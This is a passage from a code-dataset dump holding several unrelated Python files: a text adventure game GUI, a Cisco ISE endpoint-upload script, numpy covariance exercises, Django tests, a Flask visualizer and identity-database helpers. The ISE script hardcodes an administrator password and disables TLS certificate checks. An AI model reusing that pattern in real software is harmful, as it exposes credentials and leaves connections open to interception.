app.stopFrame()\n\n\"\"\"\ncombat functions\n\"\"\"\ndef updateCombat(): #set labels/meters to match new stats\n app.setMeter(\"playerHealth\",100*player.health/player.maxHealth,text=player.health)\n app.setLabel(\"playerDamage\",\"Damage: %i\"%player.damage)\n app.setLabel(\"playerArmor\",\"Armor: %i\"%player.armor)\n \n app.setLabel(\"enemyName\",\"%s\"%currentEnemy.name)\n app.setMeter(\"enemyHealth\",100*currentEnemy.health/currentEnemy.maxHealth,text=currentEnemy.health)\n app.setLabel(\"enemyDamage\",\"Damage: %i\"%currentEnemy.damage)\n app.setLabel(\"enemyArmor\",\"Armor: %i\"%currentEnemy.armor)\n\ndef startCombat(): #start combat by generating an enemy and disabling unrelated tabs\n global currentEnemy\n if not (gameMap[player.posY][player.posX].enemies):\n return\n currentEnemy = random.choice(gameMap[player.posY][player.posX].enemies) #choose an enemy from the biome the player is in\n currentEnemy.maxHealth += round(random.uniform(-currentEnemy.maxHealth/2,currentEnemy.maxHealth/2)) #add some variation on their health between 0.5 and 1.5 times \n currentEnemy.health = currentEnemy.maxHealth \n \n player.health = player.maxHealth #reset player health\n \n app.setTabbedFrameDisabledTab(\"main\",\"map\", True) #disable all other tabs\n app.setTabbedFrameDisabledTab(\"main\",\"inventory\", True)\n app.setTabbedFrameDisabledTab(\"main\",\"crafting\", True)\n app.setTabbedFrameDisabledTab(\"main\",\"combat\", False) #enable combat tab \n\n app.setTabbedFrameSelectedTab(\"main\",\"combat\",False) #go to combat tab\n \n updateCombat()\n \ndef endCombat(winner=\"none\"):#end the combat with default value of no winner\n \n app.setTabbedFrameDisabledTab(\"main\",\"map\", False) #go back to normal tabs\n app.setTabbedFrameDisabledTab(\"main\",\"inventory\", False) \n app.setTabbedFrameDisabledTab(\"main\",\"crafting\", False)\n 
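# added note: lock the combat tab again; startCombat() re-enables it for the next encounter\n    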
app.setTabbedFrameDisabledTab(\"main\",\"combat\", True) \n\n app.setTabbedFrameSelectedTab(\"main\",\"map\",False) \n \n #do stuff based on who won\n if(winner == \"enemy\"):\n output(\"You lost\")\n elif(winner == \"player\"):\n output(\"You win\")\n player.maxHealth += 1 #add one to player's health each time they win\n loot()\n elif(winner == \"none\"): #player ran away\n output(\"You managed to run away\")\n else: #shouldn't ever happen but just in case\n output(\"Something went wrong\")\n\n\n\"\"\"\nvariables\n\"\"\"\n#biome list\nbiomes = [\n Biome(\"toxic dump\",\"gold\",\"-\",[Mob(\"Toxic Sludge\",5,5,0,[\"glomps\",\"slops\"])],Biome(\"plains\",\"limegreen\",\"-\",None)), #toxic dump cleans to plains\n Biome(\"wasteland\",\"coral\",\"⁕\",[Mob(\"Radscorpion\",25,15,5,[\"stings\",\"claws\"])],Biome(\"desert\",\"palegoldenrod\",\"⁕\",None)), #wasteland cleans to desert\n Biome(\"burnt forest\",\"sienna\",\"⇑\",[Mob(\"Burning Gorilla\",5,25,9,[\"burns\",\"clubs\"])],Biome(\"forest\",\"seagreen\",\"⇑\",None)), #burnt forest cleans to forest\n Biome(\"polluted ocean\",\"darkorchid\",\"≈\",[Mob(\"Plastic Kraken\",50,50,10,[\"stings\",\"claws\"])],Biome(\"ocean\",\"dodgerblue\",\"≈\",None)) #polluted ocean cleans to ocean\n ]\n\n#list of every item\nitems = [\n Weapon(\"Sword\",\"A stabby metal object\",11,[\"Slash\",\"Stab\"]),\n Armor(\"Chestplate\",\"A large hunk of metal\",27,\"body\"),\n Weapon(\"Big Sword\",\"A big stabby metal object\",1000,[\"Smash\",\"Slam\"]),\n Item(\"Scrap Metal\",\"A piece of scrap metal\")\n ]\n\n#list of every recipe\n#need to use index of the item in the items list so that the Item object is correct\nrecipes = [\n Recipe([items[0],items[3],items[3],items[3],items[3],items[3]],items[2]),#create big sword with sword and 5 scrap metal\n Recipe([items[3],items[3]],items[1]),#create chestplate with 2 scrap metal\n Recipe([items[3]],items[0])#create sword with 1 scrap metal\n ] \n\niconSize = 20 #size of each tile on the map in pixels\ngameMap = []\nmapSize = 50 #size of the map\n\n#player stats\nplayer = Player(\"Player\",#name\n 10,#health\n 5,#damage\n 0,#armor\n [\"slashes\",\"stabs\"],#attack types\n round(mapSize/2),#x position\n round(mapSize/2),#y position\n []#inventory\n )\n\n#enemy that's being fought\ncurrentEnemy = Mob(\"Enemy\",#name\n 1,#health\n 1,#damage\n 1,#armor\n [\"jabs\",\"claws\"]#attack types\n )\n\n\n\n\"\"\"\nsetup and start gui\n\"\"\"\napp = gui(\"Waste Adventure\")\napp.setSticky(\"nesw\")\napp.setStretch(\"both\")\n\n\n\n\n\n#tabs in the gui\napp.startTabbedFrame(\"main\")\napp.setTabbedFrameTabExpand(\"main\", expand=True) #expand to fit whole gui\napp.setTabbedFrameChangeCommand(\"main\", updateInventory) #when changing tab call updateInventory(), a return in that function prevents it from happening on wrong tab\n\n\n#title tab\napp.startTab(\"title\")\napp.setStretch('column')\napp.setSticky('esw')\napp.addLabel(\"title\", \"Waste Adventure\")\n\nif(os.path.isfile('./map.txt')):#don't create continue button if no file to load\n if(os.path.isfile('./player.txt')):\n app.addButton(\"Continue\", startGame) #load save\napp.addButton(\"New Game\", startGame) #create new save\napp.stopTab()\n\n#File menu for saving/loading, functions added after game is started\napp.createMenu(\"File\")\n\n#map tab\napp.startTab(\"map\")\nmap = app.addCanvas(\"map\")\nmap.config(scrollregion=(0,0,(mapSize+2)*iconSize,(mapSize+2)*iconSize)) #x1, y1, x2, y2, height,height=(iconSize*11)+1\napp.stopTab()\n\n\n#inventory tab\napp.startTab(\"inventory\") 
#items in inventory\napp.startFrame(\"items\",row=0,column=0)\napp.stopFrame()\n\napp.addVerticalSeparator(row=0,column=1)\n\napp.startFrame(\"equipped\",row=0,column=2) #equipped items\nitemRow = 0\nfor slot in player.equipped: #create a label for each equipment slot\n app.addLabel(\"%s title\"%slot,slot.capitalize(),row=itemRow,column=2)\n app.addLabel(slot,player.equipped[slot],row=itemRow,column=3)\n app.setLabelRelief(slot,\"ridge\")\n app.setLabelTooltip(slot, player.equipped[slot])\n app.setLabelSubmitFunction(slot, player.unEquip) #unequip on click\n \n itemRow += 1\napp.stopFrame()\napp.stopTab()\n\n\n\n#crafting tab\napp.startTab(\"crafting\")\napp.startFrame(\"recipes\",row=0,column=0)\nfor recipe in recipes: #recipe list doesn't change so only needs to be done at start of gui\n app.setSticky(\"ew\") \n app.addLabel(recipe,recipe.crafted.name)\n app.setLabelTooltip(recipe, recipe.description())\n app.setLabelRelief(recipe,\"raised\")\n app.setLabelSubmitFunction(recipe, showRecipe) #on click\napp.stopFrame()\n\napp.addVerticalSeparator(row=0,column=1)\n\napp.startFrame(\"craftInfo\",row=0,column=3)#place where crafting description and button go\napp.stopFrame()\n\napp.stopTab()\n\n\n#combat tab\napp.startTab(\"combat\")\napp.addLabel(\"fight\",\"combat\")\n\n#player side of combat\napp.startFrame(\"player\",row=0,column=0)\napp.addLabel(\"playerName\",\"Player\")\n\napp.addMeter(\"playerHealth\",100)\napp.setMeterFill(\"playerHealth\",\"Green\")\napp.setMeterBg(\"playerHealth\",\"Red\")\n\napp.addLabel(\"playerDamage\",\"Damage\")\napp.addLabel(\"playerArmor\",\"Armor\")\napp.stopFrame()\n\napp.addVerticalSeparator(row=0,column=1)\n\n#enemy side of combat\napp.startFrame(\"enemy\",row=0,column=2)\napp.addLabel(\"enemyName\",\"Name\")\n\napp.addMeter(\"enemyHealth\",100)\napp.setMeterFill(\"enemyHealth\",\"Green\")\napp.setMeterBg(\"enemyHealth\",\"Red\")\n\napp.addLabel(\"enemyDamage\",\"Damage\")\napp.addLabel(\"enemyArmor\",\"Armor\")\napp.stopFrame()\n\napp.stopTab()\n\n\n#help tab\napp.startTab(\"help\")\napp.addLabel(\"helpLabel\",\"\"\"Use the arrow keys to move around the map.\nClick or drag items you want to equip.\nWhen in combat use A to attack, B to block and R to run.\"\"\")\napp.stopTab()\napp.stopTabbedFrame()\n\n\n#output log\napp.startScrollPane(\"outputPane\",row=0,column=3)\napp.addLabel(\"output\",\"\")\napp.stopScrollPane()\n\n\n#disable all tabs but title screen\napp.setTabbedFrameDisableAllTabs(\"main\", disabled=True)\napp.setTabbedFrameDisabledTab(\"main\", \"title\", disabled=False)\n\ngenerateMap()\napp.bindKeys([\"Left\",\"Right\",\"Up\",\"Down\",\"a\",\"b\",\"r\"], keys) #bind these keys to 'keys' function\n\napp.registerEvent(rebind) #every second rebind the arrow keys because scrolling unbinds them\napp.go()","sub_path":"WasteGame.py","file_name":"WasteGame.py","file_ext":"py","file_size_in_byte":23203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"285296415","text":"import csv\r\nimport json\r\nimport requests\r\nimport urllib3\r\nimport pprint\r\n\r\ndef discover_group(group_name):\r\n url = \"https://10.79.247.86:9060/ers/config/endpointgroup\"\r\n\r\n headers = {\r\n 'accept': \"application/json\",\r\n 'content-type': \"application/json\",\r\n }\r\n\r\n req = requests.get(url, headers=headers, auth=(\"admin\", \"C!sc0123\"), verify=False)\r\n\r\n group_id = []\r\n\r\n if req.status_code == 200:\r\n data = json.loads(req.text)\r\n pp = pprint.PrettyPrinter(indent=3)\r\n # 
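debug helper: uncomment to dump the raw ERS search result\r\n        # 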
pp.pprint(data.get('SearchResult'))\r\n        resource = data.get('SearchResult').get('resources')\r\n        for i in group_name:\r\n            #print(i.get(\"id\") + i.get(\"name\"))\r\n            for j in resource:\r\n                if j.get(\"name\") == i:\r\n                    group_id.append(j.get(\"id\"))\r\n        return group_id\r\n\r\ndef deal_csv(csv_file_path):\r\n    file = open(csv_file_path, \"r\")\r\n    reader = csv.reader(file)\r\n    mac_list = []\r\n    group_list = []\r\n\r\n    for i in reader:\r\n        #print(i[0][:] + i[1])\r\n        mac_list.append(i[0][:-1])\r\n        group_list.append(i[1])\r\n    return mac_list, group_list\r\n\r\ndef post_all_endpoints(mac_list, group_list):\r\n    # note: the endpoint URL must not contain a leading space\r\n    url = \"https://10.79.247.86:9060/ers/config/endpoint\"\r\n\r\n    headers = {\r\n        'accept': \"application/json\",\r\n        'content-type': \"application/json\",\r\n    }\r\n\r\n    json_list = []\r\n    count = 0\r\n    for i in mac_list:\r\n        json_format = '''{{\"ERSEndPoint\" : {{\"mac\" : \"{}\",\"groupId\" : \"{}\",\"staticGroupAssignment\" : true}}}}'''.format(i,group_list[count])\r\n        json_list.append(json_format)\r\n        count = count+1\r\n\r\n    print(json_list)\r\n\r\n    for j in json_list:\r\n        req = requests.post(url, headers=headers, auth=(\"admin\", \"C!sc0123\"), verify=False, data=j)\r\n        print(req.status_code)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n    #print(discover_group(\"Meralco_Printer\"))\r\n    # print(deal_csv(\"endpoints.csv\")[0])\r\n    mac_list, group_list = deal_csv(\"endpoints.csv\") #parse the CSV once instead of twice\r\n    print(mac_list)\r\n    print(group_list)\r\n    print(discover_group(group_list))\r\n    group_list_id_list = discover_group(group_list)\r\n    post_all_endpoints(mac_list, group_list_id_list)\r\n","sub_path":"Devnet/study/ISE_Endpoints_Assign_Group/ISE_endpoint_upload.py","file_name":"ISE_endpoint_upload.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"346427318","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution:\n    def isPalindrome(self, head: ListNode) -> bool:\n        current = head\n        new = head\n        stack = []\n        while current:\n            #count +=1\n            stack.append(current.val)\n            current = current.next\n\n        stack.reverse()\n        count = 0\n        #print(stack)\n        for i in stack:\n            if(i == new.val):\n                new = new.next\n                count +=1\n        if(count == len(stack)):\n            return True\n\n        return False\n","sub_path":"Python_leet/leet234.py","file_name":"leet234.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"206497799","text":"import os\nimport sys\nimport json\nimport time\nimport datetime\nimport random\nimport logging\nfrom logging.handlers import RotatingFileHandler\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import jsonify\nfrom flask import request\nfrom gevent import Timeout\nfrom gevent import pywsgi\nfrom geventwebsocket.handler import WebSocketHandler\n\ntry:\n    from visualizer.conf import *\n    from visualizer.module import *\nexcept:\n    from conf import *\n    from module import *\n\napp = Flask(__name__)\n\n#-- Error Handler\n@app.errorhandler(500)\ndef error_handler(err):\n    response = jsonify({ 'message': err.name, 'result': err.code })\n    return response, err.code\n\n\n#-- Application\n@app.route('/')\ndef visualizer():\n    socket_host = get_ec2_ip()\n    log = get_logfiles()\n    html = render_template('index.html', HOST=socket_host, 
PORT=port, LOG=adjust_c3(log))\n    return html\n\n\n@app.route('/socket')\ndef socket():\n    if request.environ.get('wsgi.websocket'):\n        ws = request.environ['wsgi.websocket']\n        app.logger.info('Connection Start.')\n        log = get_logfiles()\n        try:\n            while True:\n                with Timeout(frequency, False):\n                    msg = ws.receive()\n                    if msg == 'closed':\n                        break\n                diff_log = get_diff_logfiles(log)\n                log = get_logfiles()\n                if diff_log is not None:\n                    app.logger.info(diff_log)\n                    ws.send(json.dumps(adjust_c3(log)))\n                    app.logger.info('Sent to Web Socket!')\n        except Exception as e:\n            app.logger.error(e.args)\n        finally:\n            app.logger.info('Connection Closed.')\n            ws.close()\n\n    return 'Closed.'\n\n@app.route('/parameters')\ndef data():\n    return get_parameter()\n\n\ndef main():\n    handler = RotatingFileHandler(os.path.join(visualizer_home_path, 'var/flask.log'), maxBytes=10000, backupCount=1)\n    handler.setLevel(logging.INFO)\n    app.logger.addHandler(handler)\n    app.debug = debug\n    server = pywsgi.WSGIServer((host, port), app, handler_class=WebSocketHandler)\n    server.serve_forever()\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"38827895","text":"import numpy as np\nfrom numpy.linalg import inv\n\nnp.set_printoptions(precision=4)\nnp.set_printoptions(suppress=True)\nnp.set_printoptions(formatter={'float': '{: 0.3f}'.format})\n\nX = np.array([[42, 4],\n              [52, 5],\n              [48, 4],\n              [58, 3]]\n             )\n\nc1, c2 = X[:, 0], X[:, 1]\nnum_r, num_c = X.shape[0], X.shape[1]\n\n# --Mean--\nmean = np.mean(X, axis=0)\nprint(\"--Mean--\")\nprint(mean)\n\n# --Covariance--\nS = np.cov(X.T)\nprint(\"--Covariance 0--\")\nprint(S)\n\n# c = np.vstack([c1, c2])\n# cov3 = np.cov(c)\n\n# default normalization (False) is by (N - 1)\nS = np.cov(c1, c2)\nprint(\"--Covariance 1--\")\nprint(S)\n\nS0 = np.cov(c1, c2, bias=True)\nprint(\"--Covariance 2--\")\nprint(S0)\n\nX_ = X - mean  # center the data\nS = np.dot(X_.T, X_) / (num_r)\nprint(\"--Covariance 3--\")\nprint(S)\n\nnp.testing.assert_array_equal(S, S0)\n######\n# Expected value function.\n\n\ndef E(x, p):\n    expectedValue = 0\n    for i in np.arange(0, np.size(x)):\n        expectedValue += x[i] * (p[i] / np.size(x))\n    return expectedValue\n\n# Covariance coefficient function.\n\n\ndef covariance(x, y):\n    '''\n    Covariance of x and y, computed as E[XY] - E[X]E[Y].\n    '''\n    # element-wise products of each pair of values\n    xy = x * y\n\n    # Calculate the expected values for each variable and for the XY.\n    Ex = E(x, np.ones(np.size(x)))\n    Ey = E(y, np.ones(np.size(y)))\n    Exy = E(xy, np.ones(np.size(xy)))\n\n    # Calculate the covariance coefficient.\n    return Exy - (Ex * Ey)\n\nS = np.array([[covariance(c1, c1), covariance(c1, c2)],\n              [covariance(c2, c1), covariance(c2, c2)]])\nprint(\"--Covariance 4--\")\nprint(S)\nnp.testing.assert_array_equal(S, S0)\n\n\n# --Correlation--\nR0 = np.corrcoef(c1, c2)\nprint(\"--Correlation 1--\")\nprint(R0)\n\n\nX_ = X - mean  # center the data\nstd = np.std(X, axis=0)\nstdX = X_ / std\nR = np.dot(stdX.T, stdX) / (num_r)\nprint(\"--Correlation 2--\")\nprint(R)\nnp.testing.assert_array_almost_equal_nulp(R, R0)\n\n\n# Converting a Correlation Matrix to a Covariance Matrix\nD = np.diag(std)\nS = D.dot(R).dot(D)\nprint(\"--cov_from_corr 1--\")\nprint(S)\nnp.testing.assert_array_equal(S, S0)\n\n# pre-multiplying by a diagonal matrix, D.dot(R), scales each row of R\n# by the corresponding standard deviation;\n# 
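an added sanity check of that row-scaling identity (std and R are defined above):\n#   np.allclose(np.diag(std).dot(R), std[:, None] * R)  # -> True\n# 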
post-multiplying by a diagonal matrix (that is dot(D)) scales each column\n# by the corresponding standard deviation\nS = (std * R) * std[:, np.newaxis]\nprint(\"--cov_from_corr 2--\")\nprint(S)\nnp.testing.assert_array_equal(S, S0)\n\n\nS = np.dot(std[:, None], std[None, :]) * R\nprint(\"--cov_from_corr 3--\")\nprint(S)\nnp.testing.assert_array_almost_equal_nulp(S, S0)\n\n# Converting a Covariance Matrix to a Correlation Matrix\n\nD = np.sqrt(np.diag(np.diag(S)))\nDInv = inv(D)\nR = DInv.dot(S).dot(DInv)\nprint(\"--corr_from_cov 1--\")\nprint(R)\nnp.testing.assert_array_almost_equal_nulp(R, R0)\n\n\nD = np.sqrt(np.diag(S))\nR = S / D.T / D[:, np.newaxis]  # divide columns, then divide rows\nprint(\"--corr_from_cov 2--\")\nprint(R)\nnp.testing.assert_array_almost_equal_nulp(R, R0)\n\n\nR = S / (np.dot(D[:, None], D[None, :]))\nprint(\"--corr_from_cov 3--\")\nprint(R)\nnp.testing.assert_array_almost_equal_nulp(R, R0)\n","sub_path":"MultiJohnson/ex1.2.py","file_name":"ex1.2.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"84158909","text":"import datetime\n\nfrom django.db.utils import IntegrityError\nfrom django.test import TestCase\n\nfrom main.models import Project\nfrom gifter.models import Pair, Participant, Party, Rule, User\n\n\nclass ProjectModelTest(TestCase):\n\n    def test_project_creation(self):\n        project = Project.objects.create(name='Test Project', url='test_url')\n        self.assertTrue(isinstance(project, Project))\n\n    def test_duplicate_project(self):\n        Project.objects.create(name='Test Project', url='test_url_1')\n\n        with self.assertRaises(IntegrityError):\n            Project.objects.create(name='Test Project', url='test_url_2')\n\n    def test_duplicate_url(self):\n        Project.objects.create(name='Test Project 1', url='test_url')\n\n        with self.assertRaises(IntegrityError):\n            Project.objects.create(name='Test Project 2', url='test_url')\n\n    def test_string_representation(self):\n        project = Project.objects.create(name='Test Project', url='test_url')\n        self.assertEqual(str(project), project.name)\n\n\nclass UserModelTest(TestCase):\n\n    def test_user_creation(self):\n        user = User.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n        self.assertTrue(isinstance(user, User))\n\n    def test_duplicate_email(self):\n        User.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n\n        with self.assertRaises(IntegrityError):\n            User.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n\n    def test_string_representation(self):\n        user = User.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n        self.assertEqual(str(user), user.email)\n\n    # test for a bad email\n    # test for no email\n\n\nclass ParticipantModelTest(TestCase):\n\n    def test_participant_creation(self):\n        participant = Participant.objects.create(first_name='Dale', last_name='Hammond',\n                                                 
email='DaleKHammond@armyspy.com')\n self.assertEqual(str(participant), participant.email)\n\n # test for a bad email\n # test for no email\n\n\nclass RuleModelTest(TestCase):\n\n def test_rule_creation(self):\n rule = Rule.objects.create(text='Must be handmade.')\n self.assertTrue(isinstance(rule, Rule))\n\n def test_duplicate_rule(self):\n Rule.objects.create(text='Must be handmade.')\n\n with self.assertRaises(IntegrityError):\n Rule.objects.create(text='Must be handmade.')\n\n def test_string_representation(self):\n rule = Rule.objects.create(text='Must be handmade.')\n self.assertEqual(str(rule), rule.text)\n\n\nclass PartyModelTest(TestCase):\n\n def setUp(self):\n User.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n Participant.objects.create(first_name='Kristen', last_name='Conway', email='KristenCConway@dayrep.com')\n Participant.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n Rule.objects.create(text='Must be handmade.')\n Rule.objects.create(text='Must be less than $5.')\n\n self.master_party = Party(\n party_date=datetime.datetime(2018, 12, 25),\n owner_id=User.objects.get(id=1),\n\n )\n self.master_party.save()\n\n def test_party_creation(self):\n party = Party(\n party_date=datetime.datetime(2018, 12, 25),\n owner_id=User.objects.get(id=1),\n\n )\n party.save()\n self.assertTrue(isinstance(party, Party))\n\n def test_party_owner_is_user(self):\n party = Party(\n party_date=datetime.datetime(2018, 12, 25),\n owner_id=User.objects.get(id=1),\n\n )\n party.save()\n self.assertEqual(Party.objects.get(id=1).owner_id, User.objects.get(id=1))\n\n def test_add_rule(self):\n self.master_party.rules.add(1)\n self.assertEqual(Rule.objects.get(id=1).text, 'Must be handmade.')\n\n def test_string_representation(self):\n party = self.master_party\n self.assertEqual(str(party), str(party.name))\n\n\nclass PairModelTest(TestCase):\n\n def setUp(self):\n User.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n Participant.objects.create(first_name='Kristen', last_name='Conway', email='KristenCConway@dayrep.com')\n Participant.objects.create(first_name='Dale', last_name='Hammond', email='DaleKHammond@armyspy.com')\n Rule.objects.create(text='Must be handmade.')\n\n self.master_party = Party(\n party_date=datetime.datetime(2018, 12, 25),\n owner_id=User.objects.get(id=1),\n\n )\n self.master_party.save()\n\n def create_pair(self, gifter_id, recipient_id, party_id):\n return Pair.objects.create(\n gifter=Participant.objects.get(id=gifter_id),\n recipient=Participant.objects.get(id=recipient_id),\n party_id=Party.objects.get(id=party_id)\n )\n\n def test_pair_creation(self):\n pair = self.create_pair(1, 2, 1)\n self.assertTrue(isinstance(pair, Pair))\n\n def test_duplicate_pair_creation(self):\n self.create_pair(1, 2, 1)\n\n with self.assertRaises(IntegrityError):\n self.create_pair(1, 2, 1)\n","sub_path":"tests_unit/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":5939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"299964035","text":"# coding: utf-8\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass Visualization():\n def __init__(self,obs, true, sim, da, interval, nt_asm, name,xlim):\n self.obs = obs\n self.true = true\n self.sim = sim\n self.da = da\n self.interval = interval\n self.nt_asm = nt_asm\n self.name = name\n self.xlim = xlim\n\n def fit(self):\n fig = 
plt.figure(figsize=(12, 3)) # create the figure object\n        _xrange = range(len(self.true))\n\n        if(self.obs is not None):\n            _xrange2 = range(0,self.nt_asm,self.interval)\n            _xobs2 = []\n            for i in range(0,self.nt_asm,self.interval):\n                _xobs2.append(self.obs[i])\n            plt.scatter(_xrange2,_xobs2,color='red',label='Obs.')\n        plt.plot(_xrange,self.true,color='green',label='True')\n        plt.plot(_xrange,self.sim,color='blue',label='Sim.')\n        plt.plot(_xrange,self.da,color='purple',label='DA')\n        plt.xlabel(\"Time Step\",size=12)\n        plt.ylabel(self.name,size=12)\n        plt.xlim(0,self.xlim)\n        plt.legend()\n        plt.show()\n    def rmse(self):\n        _rmse_da= 0.0\n        for i in range(len(self.da)):\n            _rmse_da = _rmse_da + (self.true[i] - self.da[i])**2\n        _rmse_da = np.sqrt(_rmse_da/len(self.da))\n        _rmse_sim= 0.0\n        for i in range(len(self.sim)):\n            _rmse_sim = _rmse_sim + (self.true[i] - self.sim[i])**2\n        _rmse_sim = np.sqrt(_rmse_sim/len(self.sim)) # normalize by the number of simulated points\n        print (\"RMSE of Simulation = \", _rmse_sim)\n        print (\"RMSE of DA result = \", _rmse_da)\n","sub_path":"Lorenz63/Visualization.py","file_name":"Visualization.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"259935156","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2014-2021 Bitergia\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see <http://www.gnu.org/licenses/>.\n#\n# Authors:\n#     Santiago Dueñas \n#     Miguel Ángel Fernández \n#\n\nimport copy\nimport logging\nimport re\n\nimport django.core.exceptions\nimport django.db.utils\n\nfrom django.db.models import Q\n\nfrom grimoirelab_toolkit.datetime import datetime_utcnow, datetime_to_utc\n\nfrom .errors import AlreadyExistsError, NotFoundError, LockedIdentityError\nfrom .models import (MIN_PERIOD_DATE,\n                     MAX_PERIOD_DATE,\n                     Organization,\n                     Domain,\n                     Country,\n                     Individual,\n                     Identity,\n                     Profile,\n                     Enrollment,\n                     Operation)\nfrom .utils import validate_field\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _set_lock(individual, lock_flag):\n    \"\"\"Set a lock value for a given individual.\n\n    Sets the `is_locked` field from a given `individual`\n    object to the boolean value from `lock` variable.\n\n    :param individual: individual which `is_locked` parameter will be set\n    :param lock_flag: bool value to be set to `is_locked` parameter from the `individual`\n\n    :returns: the individual entity with `is_locked` field updated\n    \"\"\"\n    individual.is_locked = lock_flag\n    individual.save()\n\n    return individual\n\n\ndef find_individual(mk):\n    \"\"\"Find an individual entity.\n\n    Find an individual by its main key (`mk`) in the database.\n    When the individual does not exist the function will\n    raise a `NotFoundError`.\n\n    :param mk: main key or id of the individual to find\n\n    :returns: an individual object\n\n    :raises NotFoundError: when the individual with\n        the given `mk` does not exist.\n    \"\"\"\n    try:\n        logger.debug(f\"Finding individual {mk} by main key ...\")\n        individual = Individual.objects.get(mk=mk)\n    except Individual.DoesNotExist:\n        logger.debug(f\"Individual with main key {mk} does not exist\")\n        raise NotFoundError(entity=mk)\n    else:\n        logger.debug(f\"Individual with main key {mk} was found\")\n        return individual\n\n\ndef find_individual_by_uuid(uuid):\n    \"\"\"Find an individual by its identities UUIDs.\n\n    Find an individual whose identities have the parameter\n    `uuid` as their identifier. When such an individual does\n    not exist the function will raise a `NotFoundError`.\n\n    :param uuid: id to search the individual\n\n    :returns: an individual object\n\n    :raises NotFoundError: when the individual does\n        not exist.\n    \"\"\"\n    try:\n        logger.debug(f\"Finding individual {uuid} by UUID ...\")\n        individual = Individual.objects.filter(\n            Q(mk=uuid) | Q(identities__uuid=uuid)\n        )[0]\n    except IndexError:\n        logger.debug(f\"Individual with UUID {uuid} does not exist\")\n        raise NotFoundError(entity=uuid)\n    else:\n        logger.debug(f\"Individual with UUID {uuid} was found\")\n        return individual\n\n\ndef find_identity(uuid):\n    \"\"\"Find an identity.\n\n    Find an identity by its UUID in the database. When the\n    identity does not exist the function will raise\n    a `NotFoundError`.\n\n    :param uuid: id of the identity to find\n\n    :returns: an identity object\n\n    :raises NotFoundError: when the identity with the\n        given `uuid` does not exist.\n    \"\"\"\n    try:\n        logger.debug(f\"Finding identity UUID {uuid} ...\")\n        identity = Identity.objects.get(uuid=uuid)\n    except Identity.DoesNotExist:\n        logger.debug(f\"Identity with UUID {uuid} does not exist\")\n        raise NotFoundError(entity=uuid)\n    else:\n        logger.debug(f\"Identity with UUID {uuid} was found\")\n        return identity\n\n\ndef find_organization(name):\n    \"\"\"Find an organization.\n\n    Find an organization by its name in the database. 
When the\n    organization does not exist the function will raise\n    a `NotFoundError`.\n\n    :param name: name of the organization to find\n\n    :returns: an organization object\n\n    :raises NotFoundError: when the organization with the\n        given `name` does not exist.\n    \"\"\"\n    validate_field('name', name)\n\n    try:\n        logger.debug(f\"Finding organization '{name}' ...\")\n        organization = Organization.objects.get(name=name)\n    except Organization.DoesNotExist:\n        logger.debug(f\"Organization with name '{name}' does not exist\")\n        raise NotFoundError(entity=name)\n    else:\n        logger.debug(f\"Organization with name '{name}' was found\")\n        return organization\n\n\ndef find_domain(domain_name):\n    \"\"\"Find a domain.\n\n    Find a domain by its name in the database. When the\n    domain does not exist the function will raise\n    a `NotFoundError`.\n\n    :param domain_name: name of the domain to find\n\n    :returns: a domain object\n\n    :raises NotFoundError: when the domain with the\n        given `name` does not exist.\n    \"\"\"\n    validate_field('domain_name', domain_name)\n\n    try:\n        logger.debug(f\"Finding domain '{domain_name}' ...\")\n        domain = Domain.objects.get(domain=domain_name)\n    except Domain.DoesNotExist:\n        logger.debug(f\"Domain with name '{domain_name}' does not exist\")\n        raise NotFoundError(entity=domain_name)\n    else:\n        logger.debug(f\"Domain with name '{domain_name}' was found\")\n        return domain\n\n\ndef search_enrollments_in_period(mk, org_name,\n                                 from_date=MIN_PERIOD_DATE,\n                                 to_date=MAX_PERIOD_DATE):\n    \"\"\"Look for enrollments in a given period.\n\n    Returns the enrollments of an individual for a given\n    organization during a period of time.\n\n    An empty list will be returned when no enrollments could be\n    found, due to the individual or the organization not\n    existing, or when there are no enrollments assigned for that period.\n\n    :param mk: main key of the individual\n    :param org_name: name of the organization\n    :param from_date: starting date for the period\n    :param to_date: ending date for the period\n\n    :returns: a list of enrollment objects\n    \"\"\"\n    logger.debug(\n        f\"Run enrollments search; \"\n        